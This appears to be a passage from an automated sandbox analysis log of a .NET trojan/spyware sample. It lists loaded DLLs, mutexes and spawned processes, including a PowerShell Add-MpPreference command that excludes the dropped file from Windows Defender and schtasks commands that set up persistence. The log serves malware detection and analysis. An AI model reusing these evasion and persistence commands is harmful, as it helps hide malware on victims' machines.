              Source: 9758xBqgE1azKnB.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, rw6rw0BnvthyGxjk5e.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, rw6rw0BnvthyGxjk5e.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, rw6rw0BnvthyGxjk5e.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, dWu4X2POSeE0PxkDow.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, dWu4X2POSeE0PxkDow.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, rw6rw0BnvthyGxjk5e.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, rw6rw0BnvthyGxjk5e.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, rw6rw0BnvthyGxjk5e.csSecurity API names: _0020.AddAccessRule
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@33/21@0/1
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeFile created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMutant created: \Sessions\1\BaseNamedObjects\bNBVxUdiYnNCEgLdWmNnJcvXv
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeMutant created: NULL
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeMutant created: \Sessions\1\BaseNamedObjects\w8DsMRIhXrOmk0Gn
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3264:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6912
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeFile created: C:\Users\user\AppData\Local\Temp\tmpAD87.tmpJump to behavior
              Source: 9758xBqgE1azKnB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 9758xBqgE1azKnB.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 9758xBqgE1azKnB.exeReversingLabs: Detection: 57%
              Source: 9758xBqgE1azKnB.exeVirustotal: Detection: 54%
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeFile read: C:\Users\user\Desktop\9758xBqgE1azKnB.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeProcess created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeProcess created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpE11A.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmp21F.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 1852
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"Jump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeProcess created: C:\Users\user\Desktop\9758xBqgE1azKnB.exe "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeProcess created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeProcess created: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpE11A.tmp"
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmp21F.tmp"
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeProcess created: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: onecorecommonproxystub.dllJump to behavior
